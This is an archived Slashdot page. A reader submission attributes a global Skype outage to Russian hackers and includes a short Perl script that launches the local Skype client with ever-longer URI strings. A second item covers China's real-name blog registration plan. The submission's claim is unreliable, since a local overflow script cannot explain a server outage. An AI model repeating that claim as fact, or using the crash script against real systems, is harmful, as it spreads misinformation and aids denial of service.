Forgot your password?
typodupeerror
Security

Submission + - Skype crash has been caused by Russian hackers (xakep.ru) 8

An anonymous reader writes: Yesterday's Skype worldwide crash has been caused by Russian hackers, as per www.xakep.ru forum info (http://www.xakep.ru/post/39746/default.asp). They have found a local buffer overflow vulnerability caused by sending a long string to the Skype authorisation server. Within several hours those guys managed to take offline all Skype servers and prevent users from logging in. Here is exploit's code: [code]#!/usr/bin/perl # Simle Code by Maranax Porex ;D # Ya Skaypeg!! for ($i=256; $i>xCCCCC; $i=$i+256) { $eot='AAAA' x $i; call_sp(); } exit; sub call_sp() { $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\""; system("$str"); }[/code]

China Moving to Real Name Registrations for Blogs 228

dptalia writes "China is moving to require people to use their real names when blogging. The proposed solution, arrived at by the Internet Society of China (affiliated with the ministry of information) would allow bloggers to use a pseudonym when blogging as long as they used their real name when registering."

Slashdot Top Deals

"The medium is the massage." -- Crazy Nigel

Working...